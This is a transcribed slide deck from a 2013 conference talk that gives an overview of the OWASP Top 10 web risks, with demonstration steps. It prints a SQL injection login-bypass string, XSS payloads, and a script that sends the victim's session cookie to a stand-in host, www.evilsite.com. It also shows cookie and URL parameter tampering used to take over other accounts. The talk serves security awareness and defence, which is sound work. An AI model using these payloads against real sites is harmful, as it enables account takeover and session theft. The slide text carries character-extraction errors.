16th Annual Karnataka Conference

Similar documents
Top 10 Web Application Vulnerabilities

Pattern Recognition and Applications Lab WEB Security. Giorgio Giacinto.

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

How to read security test report?

Your Turn to Hack the OWASP Top 10!

Penetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant

OWASP Thailand. Proxy Caches and Web Application Security. OWASP AppSec Asia October 21, Using the Recent Google Docs 0-Day as an Example

Objec&ves. Review: Security. Google s AI is wri&ng poetry SQL INJECTION ATTACK. SQL Injec&on. SQL Injec&on. Security:

eb Security Software Studio

Applications Security

Certified Secure Web Application Engineer

Application vulnerabilities and defences

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

Web Security. Web Programming.

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

OWASP Top 10 The Ten Most Critical Web Application Security Risks

CSWAE Certified Secure Web Application Engineer

Web Application Security. Philippe Bogaerts

OWASP Top David Caissy OWASP Los Angeles Chapter July 2017

Aguascalientes Local Chapter. Kickoff

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data

Web Pen Tes)ng. Michael Hicks CMSC 498L, Fall 2012 Part 2 slides due to Eric Eames, Lead Penetra)on Tester, SAIC, March 2012


Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

EPRI Software Development 2016 Guide for Testing Your Software. Software Quality Assurance (SQA)

A4: Insecure Direct Object References

Students should have an understanding and a working knowledge in the following topics, or attend these courses as a pre-requisite:

Certified Secure Web Application Security Test Checklist

Web Applica+on Security

Mobile Malfeasance. Exploring Dangerous Mobile Code. Jason Haddix, Director of Penetration Testing

THREAT MODELING IN SOCIAL NETWORKS. Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda

Bank Infrastructure - Video - 1

Students should have an understanding and a working knowledge in the following topics, or attend these courses as a pre-requisite:


Welcome to the OWASP TOP 10

CNIT 129S: Securing Web Applications. Ch 8: Attacking Access Controls

C1: Define Security Requirements

Sichere Software vom Java-Entwickler

Simplifying Application Security and Compliance with the OWASP Top 10

OWASP Top David Johansson. Principal Consultant, Synopsys. Presentation material contributed by Andrew van der Stock

SAP Security. BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0

6-Points Strategy to Get Your Application in Security Shape

Web Application Whitepaper

OWASP Top Dave Wichers OWASP Top 10 Project Lead OWASP Board Member COO/Cofounder, Aspect Security

OWASP Review. Amherst Security Group June 14, 2017 Robert Hurlbut.

Application Security Approach

OWASP TOP 10. By: Ilia

Web Security. Marcus Bendtsen Institutionen för Datavetenskap (IDA) Avdelningen för Databas- och Informationsteknik (ADIT)

Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection

OPEN WEB APPLICATION SECURITY PROJECT OWASP TOP 10 VULNERABILITIES

Copyright

"Charting the Course to Your Success!" Securing.Net Web Applications Lifecycle Course Summary

Web Application Threats and Remediation. Terry Labach, IST Security Team

Web Applications Penetration Testing

Featuring. and. Göteborg. Ulf Larson Thursday, October 24, 13

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

An analysis of security in a web application development process

Web Security II. Slides from M. Hicks, University of Maryland

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

90% of data breaches are caused by software vulnerabilities.

Defend Your Web Applications Against the OWASP Top 10 Security Risks. Speaker Name, Job Title

Large Scale Generation of Complex and Faulty PHP Test Cases

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Web Application Vulnerabilities: OWASP Top 10 Revisited

1 About Web Security. What is application security? So what can happen? see [?]

Information Security. Gabriel Lawrence Director, IT Security UCSD

SECURITY TESTING. Towards a safer web world

Security Communications and Awareness

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Security Communications and Awareness

OWASP Top The Top 10 Most Critical Web Application Security Risks. The OWASP Foundation

CS 155 Project 2. Overview & Part A

Web Application Penetration Testing

About the OWASP Top 10

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

Exploiting and Defending: Common Web Application Vulnerabilities

Attacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security.

Secure Development Guide

CIS 4360 Secure Computer Systems XSS

JAMES BENNETT DJANGOCON EUROPE 3RD JUNE 2015 THE NET IS DARK AND FULL OF TERRORS

Administration Guide. 05 Apr TM and copyright Imagicle spa

Securing Cloud Applications with a Distributed Web Application Firewall Riverbed Technology

How To Clone, Backup & Move Your WordPress Blog! Step By Step Guide by Marian Krajcovic

Under the hood testing - Code Reviews - - Harshvardhan Parmar

WEB SECURITY: XSS & CSRF

Application security : going quicker

Hacker Academy Ltd COURSES CATALOGUE. Hacker Academy Ltd. LONDON UK

Application. Security. on line training. Academy. by Appsec Labs

Security Course. WebGoat Lab sessions

MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS

CSCE 813 Internet Security Case Study II: XSS

Avoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:

Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma

Test Harness for Web Application Attacks

V Conference on Application Security and Modern Technologies

CSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis

Solutions Business Manager Web Application Security Assessment

Transcription:

16th Annual Karnataka Conference GRC Compliance to Culture JULY 19 & 20, 2013 Topic OWASP Top 10 An Overview Speakers Akash Mahajan & Tamaghna Basu

OWASP Top 10 An Overview The Open Web Application Security Project brings out web security guidance in various forms for different stakeholders for Application Security. Whilst the Top 10 Web Risks and Vulnerabilities is their most followed and used document, the awareness level about it is still pretty low. We will cover an overview of OWASP Top 10 from a security practitioners points of view and using a few demonstrations explain why you and your organization should actively follow and start utilizing this completely free and open resource. Whether you are contemplating starting an Application Security Program or would like to validate what you are already doing, this talk and demonstration will definitely give you something to think about.

OWASP Top 10 An Overview Akash Mahajan and Tamaghna Basu

OWASP Top 10 will enable you to separate signal from the noise

Na1onal Ins1tute of Standards and Technology (NIST) - USA Na1onal Security Agency (NSA) USA Payment Card Industry Security Standards Council - Worldwide Defence Informa1on Systems Agency (DISA) USA Europe Network and Informa1on Security Agency (ENISA) USA Other agencies like IEEE, ANSSI France, BSI Germany, Center for Internet Security USA, CPNI UK Who follows OWASP Top 10?

All the juicy data is in the app layer now

Vulnerability + Threat = Risk

Untrusted Input ANack In & Data Out

Untrusted Input

A1 - Injection OWASP Top 10 An Overview

A1 - SQL Injection Normal Login

A1 - SQL Injection Login Successful

A1 - SQL Injection Invalid Username/password

A1 - SQL Injection Type admin

A1 - SQL Injection DB error: You have an error in SQL syntax

A1 - SQL statement in error details: SELECT * FROM accounts WHERE username = admin AND password= admin

What we got: SELECT * FROM accounts WHERE username = admin AND password= admin SQL statement to bypass validation: SELECT * FROM accounts WHERE username = admin or 1 = 1 AND password= admin or 1 = 1 Attack vector: admin or 1 = 1 A1 - SQL Injection

A1 - SQL Injection admin or 1 = 1

A1 - SQL Injection Login bypass

A1 - SQL Injection Data extraction

A1 - SQL Injection

A3 Cross Site Scripting / XSS OWASP Top 10 An Overview

A3 - XSS

A3 - XSS User input is rexlected back to the page

A3 - XSS - <script>alert(1)</script>

A3 XSS Script got executed

A3 - XSS - <script>alert(document.cookie)</script>

A3 - XSS Got the cookie

<script>window.loca1on="hnp://www.evilsite.com? cookie="+document.cookie;</script> hnp://www.evilsite.com/?cookie=showhints=0;%20username=ed; %20uid=1;%20PHPSESSID=fggru3irrkl@ff6js91uida24 Session Hijacking A3 - XSS - What is next?

Authentication Do I really know you?

On the internet nobody knows you are a dog

A2 - Broken Authentication & Session Management OWASP Top 10 An Overview

A2 Login with username ed

A2 Logged in as ed

A2 View Cookie name: uid, value: 16

A2 Change the value: 1

A2 Reload the page, user changed to admin

I am not sure if you are allowed to do that.

A4 Insecure Direct Object Reference OWASP Top 10 An Overview

hgps://www.onlinebank.com/user?acct=6065 ANacker no1ces his acct parameter is 6065?acct=6065 He modifies it to a nearby number?acct=6066 ANacker views the vic1m s account informa1on A4 Accessing another person s account

A7 Missing function level access control OWASP Top 10 An Overview

ANacker no1ces the URL indicates his role /user/getaccounts He modifies it to another directory (role) /admin/getaccounts, or /manager/getaccounts Failure to Restrict URL Access Illustrated ANacker views more accounts than just their own

A8 Cross Site Request Forgery OWASP Top 10 An Overview

CSRF? Active Connection Vic1m Sends request with cookie without his knowledge Web Applica1on Fake Link with some fancy offer ANacker

Security Mistakes Its funny when it happens to others

You ran the web server as root with 777 for uploads!

Network Solu1ons s shared Wordpress hos1ng rwxrwxrwx 1 root root 0 2010-11- 23 08:21 wp- config.php A5 Security MisconXigurations

A6 Sensitive Data Exposure

A9 Using components with known vulnerabilities

A1 - Injec1on A3 Cross Site Scrip1ng Untrusted Inputs A2 - Broken Authen1ca1on & Session Management A4 - Insecure Direct Object Reference A7 - Missing func1on level access control A8 - Cross Site Request Forgery Authen1ca1on /Authoriza1on A5 - Security Misconfigura1on A6 - Sensi1ve Data Exposure A9 - Using vulnerable components Security Mistakes Recap

Use OWASP and write secure apps Conclusions

akashmahajan@gmail.com tamaghna.basu@gmail.com Do you have any questions?

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback